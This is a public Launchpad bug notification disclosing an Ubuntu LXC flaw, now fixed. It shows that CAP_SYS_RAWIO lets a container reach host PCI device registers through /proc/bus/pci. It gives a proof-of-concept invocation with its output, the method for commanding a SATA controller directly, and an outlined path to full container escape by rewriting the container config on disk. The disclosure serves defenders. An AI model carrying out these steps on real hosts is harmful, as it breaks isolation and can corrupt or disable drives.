** Changed in: lxc (Ubuntu)
Status: Triaged => Fix Released
** Information type changed from Private Security to Public
--
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1511197
Title:
PCI Device Access Through /proc/
Status in lxc package in Ubuntu:
Fix Released
Bug description:
PCI Device Control Region Access From Within Containers
#Summary:
* From within a container, it is possible to access the control regions
of devices attached to the host PCI bus by using the /proc/bus/pci/ interface.
This is allowed because of the CAP_SYS_RAWIO capability which is by default
enabled inside an LxC container. This proof of concept uses this vulnerability
to speak to an AHCI device directly, and ask a SATA drive to identify itself
(although it could
trivially be used to create a denial-of-service of the drive instead). The
usage
of an AHCI drive is an arbitrary choice, a different approach may be to go
after other targets
on the PCI bus, such as the network controller.
* This proof of concept is meant to demonstrate the ability to circumvent
containerization
by communicating with underlying hardware directly. It is likely this could
be leveraged
into full access to the underlying hard disk, however, this exploitation
would be quite
complicated, and is discussed in full later.
#Reproduction:
* The test environment for me was a vmware workstation system running
Ubuntu. The primary disk was a SCSI disc, but I added a secondary 1GB SATA
disk, with no special settings (write caching was enabled by default).
You can talk to it if it's mounted or not.
* I created a default LxC environment using the instructions at
https://help.ubuntu.com/lts/serverguide/lxc.html.
* As the root user in the LxC container, I used lspci -vv to get the
information about the target AHCI device:
02:05.0 SATA controller: VMware Device 07e0 (prog-if 01 [AHCI 1.0])
Subsystem: VMware Device 07e0
Physical Slot: 37
Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr-
Stepping- SERR- FastB2B- DisINTx+
Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=fast >TAbort-
<TAbort- <MAbort- >SERR- <PERR- INTx-
Latency: 64
Interrupt: pin A routed to IRQ 72
Region 5: Memory at fd5ee000 (32-bit, non-prefetchable) [size=4K]
[virtual] Expansion ROM at e7b10000 [disabled] [size=64K]
Capabilities: [40] Power Management version 3
Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA
PME(D0-,D1-,D2-,D3hot+,D3cold-)
Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME-
Capabilities: [48] MSI: Enable+ Count=1/1 Maskable- 64bit+
Address: 00000000fee00000 Data: 4024
Capabilities: [60] SATA HBA v1.0 InCfgSpace
Capabilities: [70] PCI Advanced Features
AFCap: TP+ FLR+
AFCtrl: FLR-
AFStatus: TP-
Kernel driver in use: ahci
* Compile and execute the attached tool (pciread.c), and then run it within
the container. In this example, the invocation was:
#./pciread -b 02 -d 05 -f 0 -a 0xfd5ee000 -p 1
And I get the following output:
bar: fd5ee000 bus: 02 device: 05 function: 0
opened /proc/bus/pci/02/05.0
mapping 1 pages of size: 4096
AHCI 0001.0300 32 slots 30 ports 6 Gbps 0x3fffffff impl
IRQs disabled
Supports 64-bit addresses
Supports native command queuing
DMA buffer @ 0x35b6b000
cmd list buffer @ 0x25f9c000
FIS buffer @ 0x26ccf000
cmd buffer @ 0xe7e3000
p->ports_impl: 0x3fffffff
--------- port 0 ---------
command list base address: 0x0
FIS base address: 0x14c29000
interrupt status: 0x0
interrupt enable: 0x7840007f
PORT_IRQ_D2H_REG_FIS
PORT_IRQ_PIOS_FIS
PORT_IRQ_DMAS_FIS
PORT_IRQ_SDB_FIS
PORT_IRQ_UNK_FIS
PORT_IRQ_SG_DONE
PORT_IRQ_CONNECT
PORT_IRQ_PHYRDY
PORT_IRQ_IF_ERR
PORT_IRQ_HBUS_DATA_ERR
PORT_IRQ_HBUS_ERR
PORT_IRQ_TF_ERR
command and status: 0x44016
PORT_CMD_SPIN_UP
PORT_CMD_POWER_ON
PORT_CMD_FIS_RX
PORT_CMD_FIS_ON
signature : 0x101 (SATA drive)
tfd : 0x441
status : 0x123
errors : 0x0
active : 0x0
control : 0x320
---------------------------
interrupt status before: 0x0
start bit before: 0
interrupt status after: 0x2
PORT_IRQ_PIOS_FIS
Waiting for command completion
Seems to have completed...
Got response data in DMA buffer:
0x7f5a27873000: 7a 42 ab 08 00 00 0f 00 00 00 00 00 3f 00 00 00
zB....... .......
0x7f5a27873010: 00 00 00 00 30 30 30 30 30 30 30 30 30 30 30 30
....00000 0000000
0x7f5a27873020: 30 30 30 30 30 30 31 30 00 00 40 00 00 00 30 30
00000010. .....00
0x7f5a27873030: 30 30 30 30 31 30 4d 56 61 77 65 72 56 20 72 69
000010MVa werV.ri
0x7f5a27873040: 75 74 6c 61 53 20 54 41 20 41 61 48 64 72 44 20
utlaS.TA. AaHdrD.
0x7f5a27873050: 69 72 65 76 20 20 20 20 20 20 20 20 20 20 ff 80
irev..... .......
0x7f5a27873060: 00 00 00 0f 01 40 00 02 00 00 07 00 ab 08 0f 00
......... .......
0x7f5a27873070: 3f 00 3b ff 1f 00 ff 01 00 00 20 00 00 00 07 00
......... .......
0x7f5a27873080: 03 00 78 00 78 00 78 00 78 00 00 00 00 00 00 00
..x.x.x.x .......
0x7f5a27873090: 00 00 00 00 00 00 1f 00 06 01 00 00 00 00 00 00
......... .......
0x7f5a278730a0: 7e 00 18 00 08 40 08 74 00 41 08 40 80 34 00 41
.......t. A...4.A
[SNIP]
* The hexdump output shows the ATA IDENTIFY command response sent back
from the controller.
* There are some assumptions the code makes. It assumes the drive it is
going to talk to is the first device it finds in the AHCI port list
that is actually active.
* Also it doesn't cleanly recover everything after getting the response,
so the state of the mapped registers is wrong and the kernel won't be
able to mount the device afterwards or anything.
# Explanation of PoC
While reading the attached code is instructive, here is an overview of the
methodology used:
* Map the control region of the AHCI device into memory through the
/proc/bus/pci/ interface using open(), mmap(), and ioctl().
* Allocate several buffers, and determine their logical address using
/proc/self/pagemap.
* Disable interrupts for the device.
* Find the port the drive is attached to.
* Set the FIS, Command, and Command List pointers on the device to the
previously allocated buffers.
* Create a H2D FIS (to tell the drive to identify itself), a command to wrap
the FIS (telling the drive to use a DMA buffer we have allocated), and a
command list structure containing the command.
* Copy all of these to our previously allocated buffers, which the device
also now has pointers to.
* Flip the start bit on the device to cause it process commands from the
command list.
* Sleep for a second, then spin loop until the drive has processed our
command.
* The drive has now executed our command (ATA_CMD_ID_ATA, which is the drive
identification command), and written the result to a buffer we allocated. We
print it out, and attempt (poorly) to restore the drive's state.
# Full Impact
As said earlier, by zeroing out the device's control regions, the
device is rendered inoperable until a host restart. In addition,
exploitation of a different PCI device may prove an easier target for
an attacker.
Continuing with the AHCI device scenario, it is very likely this
vulnerability could be leveraged for arbitrary reads/writes to the
underlying drive. Doing this is not at all straightforward, stemming
from to the fact that you are not the kernel. In order to actually
issue commands to the AHCI device, it is necessary to change the
several pointers in the AHCI device's memory. Because the kernel keeps
its own cached copy of these pointers and their contents, requests the
kernel makes to the device during this time will at best be incorrect,
and at worst will cause a kernel crash/panic/oops.
An exploitation scenario for full container escape would look roughly
like:
* Create a situation where the disc is idle. This could be done a number of
ways:
** Engage the kernel in processor intensive activity that does not
require disc access (so nothing that will require using swap). This may be
somewhat easier than expected due to CAP_SYS_NICE.
** Disable interrupts on the device. It's not clear to me whether the
kernel would crash/panic/oops, or whether it would behave itself for short
amounts of time with the device's interrupts disabled.
** Set the device's busy flags to tell the kernel the device is busy.
However, the kernel is free to ignore these.
** Opportunistically wait until the drive is idle.
* Issue a FIS to read the superblock of the disc into memory and parse it.
* Repeat this process of reading inodes to navigate the inode tree until you
have found the inode for the targeted lxc.container.config file.
* Find the block which contains the piece of this file you wish to modify and
read it into memory.
* Modify it so that the configuration calls for the host root to be mounted
inside the container RW.
* Issue a FIS to overwrite the targeted block with the new modified block.
* On container restart, you now have the true root mounted inside your
container.
Note that it may be necessary to perform each one of these drive
operations individually, and then restore the drive to its original
state in between, as to not alarm the kernel. Reading more than a page
size of data is also potentially problematic, as you need to ensure
your allocated buffer is contiguous in physical memory. However, this
could likely be accomplished with something analogous to heap feng
shui, or by simply by reading multi-page targets in multiple requests
of at most one page.
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1511197/+subscriptions
--
Mailing list: https://launchpad.net/~touch-packages
Post to : [email protected]
Unsubscribe : https://launchpad.net/~touch-packages
More help : https://help.launchpad.net/ListHelp